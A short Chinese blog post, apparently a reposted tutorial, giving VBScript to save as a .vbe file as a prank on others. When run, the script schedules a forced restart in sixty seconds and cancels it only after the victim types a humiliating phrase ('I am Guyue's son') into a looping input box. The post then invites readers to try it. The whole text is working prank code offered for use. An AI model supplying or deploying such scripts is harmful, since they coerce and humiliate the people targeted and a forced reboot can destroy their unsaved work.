打开记事本复制 on error resume next dim WSHshellA set WSHshellA = wscript.createobject("wscript.shell") WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是古月的儿子,不说我是古月的儿子,不然就一分钟关你机,不信,试试···"" ",0 ,true dim a do while(a <> "我是古月的儿子") a = inputbox ("说我是古月的儿子,就不关机,快撒,说 ""我是古月的儿子"" ","说不说","不说",8000,7000) msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox" loop msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛" dim WSHshell set WSHshell = wscript.createobject("wscript.shell") WSHshell.run "cmd.exe /c shutdown -a",0 ,true msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾" 最后,另存为 XXX .vbe 一定要记住,要打上后缀名 .vbe 作完以后,可以自己先试验一下,好不好玩…………
版权声明:本文为zhoulingjie311原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。